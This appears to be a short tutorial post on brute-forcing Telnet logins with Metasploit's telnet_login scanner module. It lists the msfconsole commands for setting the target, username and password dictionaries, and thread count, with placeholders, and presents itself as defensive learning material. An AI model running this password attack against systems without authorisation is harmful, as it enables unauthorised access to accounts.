【英文】msf密码爆破之telnet服务

Preface

Using the telnet_login module of msf for Telnet password cracking.

This article is only for learning purposes in network information defense.

Usage of the module

1
msf > use auxiliary/scanner/telnet/telnet_login

Set target host

<ip>: Target host

1
msf > set RHOSTS <ip>

Set username (optional)

<username>: Set the username directly if it is known

1
msf > set USERNAME <username>

Set username dictionary (optional)

<dic>: Set the username dictionary file if the username is unknown

1
msf > set USER_FILE <dic>

Set password (optional)

<password>: Set the password directly if it is known

1
msf > set PASSWORD <password>

Set password dictionary (optional)

<dic>: Set the password dictionary file if the password is unknown

1
msf > set PASS_FILE <dic>

Set concurrency threads

<num>: Number of threads

1
msf > set THREADS <num>

Execute the script

1
msf > exploit

Finished

References

Bilibili - Qianfeng Education Network Security College